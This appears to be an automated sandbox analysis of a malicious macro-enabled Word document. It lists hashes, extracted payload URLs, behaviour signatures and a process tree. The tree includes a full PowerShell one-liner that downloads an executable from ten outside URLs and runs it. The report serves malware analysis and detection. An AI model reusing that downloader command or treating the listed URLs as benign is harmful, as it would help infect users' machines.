Analysis
- max time kernel: 70s
- max time network: 137s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 21-05-2022 03:38
Tasks
- Static task: static1
- Behavioral task: behavioral1 (sample 08142020_1955816493.docm, resource win7-20220414-en)
- Behavioral task: behavioral2 (sample 08142020_1955816493.docm, resource win10v2004-20220414-en)
General
- Target: 08142020_1955816493.docm
- Size: 381KB
- MD5: 8b9a76bee8f32292b25d55383c100d2c
- SHA1: fe63d6a4046682dabce9cc6e49bc22fbbb8399e4
- SHA256: a1ea10b25a1dd9165910a6859847f4bc6437f06e4651f8cc31ddf3b9d50be3c2
- SHA512: 9fc9740134ec8bd07b7f18ce2ab4b52136ebce65ed7d5a62493efceb545ba2a1aedd2217360f933f386716ccb5554a0700aef17949b724e7e301ab6cdaa22d15
Malware Config
Extracted URLs:
http://rijschoolfastandserious.nl/rprmloaw/111111.png
http://nanfeiqiaowang.com/tsxwe/111111.png
http://forum.insteon.com/suowb/111111.png
http://webtest.pp.ua/yksrpucvx/111111.png
http://quoraforum.com/btmlxjxmyxb/111111.png
http://quickinsolutions.com/wfqggeott/111111.png
http://bronco.is/pdniovzkgwwt/111111.png
http://studiomascellaro.it/wnzzsbzbd/111111.png
http://craniotylla.ch/vzufnt/111111.png
http://marineworks.eu/dwaunrsamlbq/111111.png
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 216 | 3928 | explorer.exe | WINWORD.EXE
- Blocklisted process makes network request (15 IoCs)
  Processes:
    flow | pid | process
    25 | 2780 | powershell.exe
    27 | 2780 | powershell.exe
    28 | 2780 | powershell.exe
    30 | 2780 | powershell.exe
    49 | 2780 | powershell.exe
    50 | 2780 | powershell.exe
    53 | 2780 | powershell.exe
    55 | 2780 | powershell.exe
    56 | 2780 | powershell.exe
    58 | 2780 | powershell.exe
    59 | 2780 | powershell.exe
    61 | 2780 | powershell.exe
    64 | 2780 | powershell.exe
    66 | 2780 | powershell.exe
    67 | 2780 | powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | WScript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
- Delays execution with timeout.exe (1 IoC)
  Processes:
    pid | process
    5036 | timeout.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
- Kills process with taskkill (1 IoC)
  Processes:
    pid | process
    5112 | taskkill.exe
- Modifies registry class (1 IoC)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | explorer.exe
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes:
    pid | process
    3928 | WINWORD.EXE
    3928 | WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid | process
    2780 | powershell.exe
    2780 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 5112 | taskkill.exe
    Token: SeDebugPrivilege | 2780 | powershell.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
    pid | process
    3928 | WINWORD.EXE
    3928 | WINWORD.EXE
    3928 | WINWORD.EXE
    3928 | WINWORD.EXE
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes:
    description | pid | process | target process
    PID 3928 wrote to memory of 216 | 3928 | WINWORD.EXE | explorer.exe
    PID 3928 wrote to memory of 216 | 3928 | WINWORD.EXE | explorer.exe
    PID 2516 wrote to memory of 4356 | 2516 | explorer.exe | WScript.exe
    PID 2516 wrote to memory of 4356 | 2516 | explorer.exe | WScript.exe
    PID 4356 wrote to memory of 4092 | 4356 | WScript.exe | cmd.exe
    PID 4356 wrote to memory of 4092 | 4356 | WScript.exe | cmd.exe
    PID 4092 wrote to memory of 5112 | 4092 | cmd.exe | taskkill.exe
    PID 4092 wrote to memory of 5112 | 4092 | cmd.exe | taskkill.exe
    PID 4092 wrote to memory of 2780 | 4092 | cmd.exe | powershell.exe
    PID 4092 wrote to memory of 2780 | 4092 | cmd.exe | powershell.exe
    PID 4092 wrote to memory of 5036 | 4092 | cmd.exe | timeout.exe
    PID 4092 wrote to memory of 5036 | 4092 | cmd.exe | timeout.exe
Processes (the number in brackets is the depth in the process tree; indentation shows parent/child relationships)
- [1] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\08142020_1955816493.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\explorer.exe
    Command line: explorer.exe C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs
    - Process spawned unexpected child process
- [1] C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd" "
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\taskkill.exe
        Command line: Taskkill /IM "winword.exe" /F
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: POWerShell Foreach($url in @('http://rijschoolfastandserious.nl/rprmloaw/111111.png','http://nanfeiqiaowang.com/tsxwe/111111.png','http://forum.insteon.com/suowb/111111.png','http://webtest.pp.ua/yksrpucvx/111111.png','http://quoraforum.com/btmlxjxmyxb/111111.png','http://quickinsolutions.com/wfqggeott/111111.png','http://bronco.is/pdniovzkgwwt/111111.png','http://studiomascellaro.it/wnzzsbzbd/111111.png','http://craniotylla.ch/vzufnt/111111.png','http://marineworks.eu/dwaunrsamlbq/111111.png')) { try{$path = 'C:\BlotRots\Loterios.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\timeout.exe
        Command line: TIMEOUT /T 10
        - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd
  Filesize: 5KB
  MD5: 2d63e5c7ff61a560f0cc7dccd0661bf6
  SHA1: 995efc69bd84b193786de1a993ad7052f14e9542
  SHA256: 94a12075382cb44133ba8dd51973b583d4c2514f7d3d7414ae4d9a92b5354584
  SHA512: 94254c0bbbc1c06bc93aeb6264d7d2cdd46ba3ff55fccdc3a669d3d713083a45b9e066a780f5b9684e6b8226c4acaca80df6d61ad5bb1d53c6bb66d9ec2e073c
- C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs
  Filesize: 68KB
  MD5: ad7b09adba59218ce485148faf21dc82
  SHA1: 0a3851f903f7d928688e5ebeee13f6d5d921b4de
  SHA256: 214fd312196dd5769f94ed778c50df1eaf49a5c8287c67edcf2fbd05dff02cb2
  SHA512: 1fb8361f343e174574eae776fae701580c32dcbb6e120e181190bafb80d5968af788d1edb68f1450d6ddbd62f0bc15d8d9c5bcce6187d712a3afe71c57669f4f
- C:\ProgramData\UIYUIYUIYuiyuiYUIYYuyty.vbs
  Filesize: 2KB
  MD5: f07e30c22ead3c49606617eb04fbf9c7
  SHA1: 539dbd8cda2c1e6ada7a02e146c33b5aae7b1099
  SHA256: 4639cb4ccdef149ef325770ccf4fff658b7cb528d71661113dbfe9e1c683dbf9
  SHA512: 10f721ecf33fe97d074e2b5dd538ff83527a7db3ac4a0cfda183db9c9a2949dc9dd17361eb89e40e4a9865444c721108e1c4b7525337d83ba533250cb6ab052b
- memory/216-138-0x0000000000000000-mapping.dmp
- memory/2780-149-0x0000000000000000-mapping.dmp
- memory/2780-151-0x00007FFCA7520000-0x00007FFCA7FE1000-memory.dmp
  Filesize: 10.8MB
- memory/2780-150-0x00000153F88A0000-0x00000153F88C2000-memory.dmp
  Filesize: 136KB
- memory/3928-134-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp
  Filesize: 64KB
- memory/3928-137-0x000001EAB62C0000-0x000001EAB62C4000-memory.dmp
  Filesize: 16KB
- memory/3928-136-0x00007FFC84500000-0x00007FFC84510000-memory.dmp
  Filesize: 64KB
- memory/3928-135-0x00007FFC84500000-0x00007FFC84510000-memory.dmp
  Filesize: 64KB
- memory/3928-142-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp
  Filesize: 64KB
- memory/3928-143-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp
  Filesize: 64KB
- memory/3928-145-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp
  Filesize: 64KB
- memory/3928-144-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp
  Filesize: 64KB
- memory/3928-130-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp
  Filesize: 64KB
- memory/3928-133-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp
  Filesize: 64KB
- memory/3928-132-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp
  Filesize: 64KB
- memory/3928-131-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp
  Filesize: 64KB
- memory/4092-146-0x0000000000000000-mapping.dmp
- memory/4356-141-0x0000000000000000-mapping.dmp
- memory/5036-152-0x0000000000000000-mapping.dmp
- memory/5112-148-0x0000000000000000-mapping.dmp